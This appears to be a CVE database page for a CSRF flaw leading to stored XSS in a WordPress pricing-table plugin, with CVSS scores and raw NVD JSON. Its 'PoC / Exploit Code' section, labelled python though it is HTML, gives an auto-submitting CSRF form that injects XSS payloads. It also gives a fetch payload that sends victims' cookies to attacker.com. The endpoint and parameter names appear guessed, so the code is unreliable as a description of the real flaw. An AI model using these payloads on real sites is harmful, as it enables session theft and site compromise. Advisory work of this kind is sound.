Security Vulnerability Report
中文
CVE-2025-62886 CVSS 7.1 HIGH

CVE-2025-62886

Published: 2025-10-27 02:15:47
Last Modified: 2026-04-27 18:16:27

Description

Cross-Site Request Forgery (CSRF) vulnerability in wpdevart Pricing Table builder wpdevart-pricing-table allows Stored XSS.This issue affects Pricing Table builder: from n/a through <= 1.5.3.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

wpdevart Pricing Table builder <= 1.5.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-62886: wpdevart Pricing Table Stored XSS --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2025-62886</title> </head> <body> <h1>CSRF PoC for wpdevart Pricing Table</h1> <p>This page will automatically submit a CSRF attack to inject stored XSS.</p> <form action="http://target-wordpress-site/wp-admin/admin-post.php" method="POST" id="csrfForm"> <input type="hidden" name="action" value="save_pricing_table"> <input type="hidden" name="table_id" value="1"> <input type="hidden" name="table_name" value="<img src=x onerror='alert(document.cookie)'>Malicious Table"> <input type="hidden" name="table_data" value='{"price":"<script>alert(String.fromCharCode(88,83,83))</script>"}'> <input type="hidden" name="security_nonce" value=""> </form> <script> // Auto-submit form when page loads document.getElementById('csrfForm').submit(); </script> <p>If you see this message, the form has been submitted.</p> </body> </html> <!-- Alternative PoC using fetch API --> <script> // Fetch-based CSRF attack for CVE-2025-62886 fetch('http://target-wordpress-site/wp-admin/admin-ajax.php', { method: 'POST', credentials: 'include', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: 'action=wpdevart_pricing_table_save&table_title=<img src=x onerror=fetch(`https://attacker.com/steal?c=\`+document.cookie+\``)>' }); </script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62886", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:47.490", "lastModified": "2026-04-27T18:16:26.997", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in wpdevart Pricing Table builder wpdevart-pricing-table allows Stored XSS.This issue affects Pricing Table builder: from n/a through <= 1.5.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wpdevart-pricing-table/vulnerability/wordpress-pricing-table-builder-plugin-1-5-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}